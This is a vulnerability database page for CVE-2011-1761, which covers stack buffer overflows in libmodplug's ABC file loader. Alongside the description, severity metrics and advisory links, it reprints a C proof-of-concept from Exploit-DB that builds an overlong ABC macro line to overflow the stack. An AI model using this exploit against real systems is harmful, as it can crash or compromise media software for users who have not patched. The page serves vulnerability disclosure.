CVE-2011-1761 : Detail

CVE-2011-1761

Overflow
35%V4
Network
2012-06-07
19h00 +00:00
2012-06-07
19h00 +00:00
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

Multiple stack-based buffer overflows in the (1) abc_new_macro and (2) abc_new_umacro functions in src/load_abc.cpp in libmodplug before 0.8.8.3 allow remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a crafted ABC file. NOTE: some of these details are obtained from third party information.

CVE Informations

Related Weaknesses

CWE-ID Weakness Name Source
CWE-119 Improper Restriction of Operations within the Bounds of a Memory Buffer
The product performs operations on a memory buffer, but it reads from or writes to a memory location outside the buffer's intended boundary. This may result in read or write operations on unexpected memory locations that could be linked to other variables, data structures, or internal program data.

Metrics

Metrics Score Severity CVSS Vector Source
V2 6.8 AV:N/AC:M/Au:N/C:P/I:P/A:P nvd@nist.gov

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Exploit information

Exploit Database EDB-ID : 17222

Publication date : 2011-04-27 22h00 +00:00
Author : epiphant
EDB Verified : Yes

#include <libmodplug/modplug.h> #include <stdio.h> #include <string.h> /* libmodplug <= 0.8.8.2 .abc stack-based buffer overflow poc http://modplug-xmms.sourceforge.net/ by: epiphant this exploits one of many overflows in load_abc.cpp lol vlc media player uses libmodplug greets: defrost, babi, ming_wisher, emel1a, a.v., krs date: 28 april 2011 tested on: centos 5.6 */ int main(void) { char test[512] = "X: 1\nU: "; unsigned int i; i = strlen(test); while (i < 278) test[i++] = 'Q'; test[i++] = '1' + 32; test[i++] = '3'; test[i++] = '3'; test[i++] = '4'; while (i < 286) test[i++] = 'A'; test[i++] = '\n'; test[i] = '\0'; strcat(test, "T: Here Without You (Transcribed by: Bungee)\n"); strcat(test, "Z: 3 Doors Down\n"); strcat(test, "L: 1/4\n"); strcat(test, "Q: 108\n"); strcat(test, "K: C\n\n"); strcat(test, "[A,3A3/4] [E9/8z3/8] A3/8 [c9/8z3/8] [A9/8z3/8] [E3/4z3/8]\n"); i = strlen(test); ModPlug_Load(test, i); return 0; }

Products Mentioned

Configuraton 0

Konstanty_bialkowski>>Libmodplug >> Version To (including) 0.8.8.2

Konstanty_bialkowski>>Libmodplug >> Version 0.8

Konstanty_bialkowski>>Libmodplug >> Version 0.8.4

Konstanty_bialkowski>>Libmodplug >> Version 0.8.5

Konstanty_bialkowski>>Libmodplug >> Version 0.8.6

Konstanty_bialkowski>>Libmodplug >> Version 0.8.7

Konstanty_bialkowski>>Libmodplug >> Version 0.8.8

Konstanty_bialkowski>>Libmodplug >> Version 0.8.8.1

References

http://www.debian.org/security/2012/dsa-2415
Tags : vendor-advisory, x_refsource_DEBIAN
http://secunia.com/advisories/44870
Tags : third-party-advisory, x_refsource_SECUNIA
http://www.osvdb.org/72157
Tags : vdb-entry, x_refsource_OSVDB
http://ubuntu.com/usn/usn-1148-1
Tags : vendor-advisory, x_refsource_UBUNTU
http://secunia.com/advisories/44695
Tags : third-party-advisory, x_refsource_SECUNIA
http://secunia.com/advisories/48058
Tags : third-party-advisory, x_refsource_SECUNIA
http://www.exploit-db.com/exploits/17222
Tags : exploit, x_refsource_EXPLOIT-DB
http://secunia.com/advisories/45742
Tags : third-party-advisory, x_refsource_SECUNIA
http://www.openwall.com/lists/oss-security/2011/05/02/19
Tags : mailing-list, x_refsource_MLIST
http://www.openwall.com/lists/oss-security/2011/05/02/1
Tags : mailing-list, x_refsource_MLIST
http://secunia.com/advisories/44388
Tags : third-party-advisory, x_refsource_SECUNIA